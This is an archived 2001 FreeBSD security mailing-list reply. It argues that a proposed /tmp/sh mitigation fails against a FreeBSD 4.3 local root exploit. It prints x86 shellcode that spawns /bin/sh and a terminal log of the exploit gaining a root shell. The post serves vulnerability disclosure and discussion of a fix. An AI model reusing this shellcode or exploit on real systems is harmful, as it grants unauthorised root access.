Date:      Thu, 12 Jul 2001 19:32:21 +0200
From:      "Przemyslaw Frasunek" <venglin@freebsd.lublin.pl>
To:        "jamie rishaw" <jamie@playboy.com>, "alexus" <ml@db.nexgen.com>
Cc:        "Gabriel Rocha" <grocha@geeksimplex.org>, <security@FreeBSD.ORG>
Subject:   Re: FreeBSD 4.3 local root
Message-ID:  <087701c10af8$9ed30040$2001a8c0@clitoris>
References:  <20010712120706.B1020@geeksimplex.org> <079e01c10aef$21fd1460$2001a8c0@clitoris> <001f01c10af7$9b42f120$97625c42@alexus> <20010712122743.C14782@playboy.com>

> su
> cd /tmp
> touch sh
> chmod 000 sh
> chflags schg sh

Anyone could use shellcode which calls /bin/sh directly; your fix won't work
in this case...

unsigned char bsdshell[] = "\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x31\xdb\xb8\x17\xaa\xaa\xaa\x25\x17\x55\x55\x55\x53\x53\xcd\x80"
        "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
        "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
        "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
        "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

riget:venglin:~> ./dupa
vvfreebsd. Written by Georgi Guninski
shall jump to bfbffe4a
child=83578
Password:done

# id
uid=0(root) gid=1001(users) groups=1001(users), 99(rexec)
# ls -la /tmp/sh
ls: /tmp/sh: No such file or directory

--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF *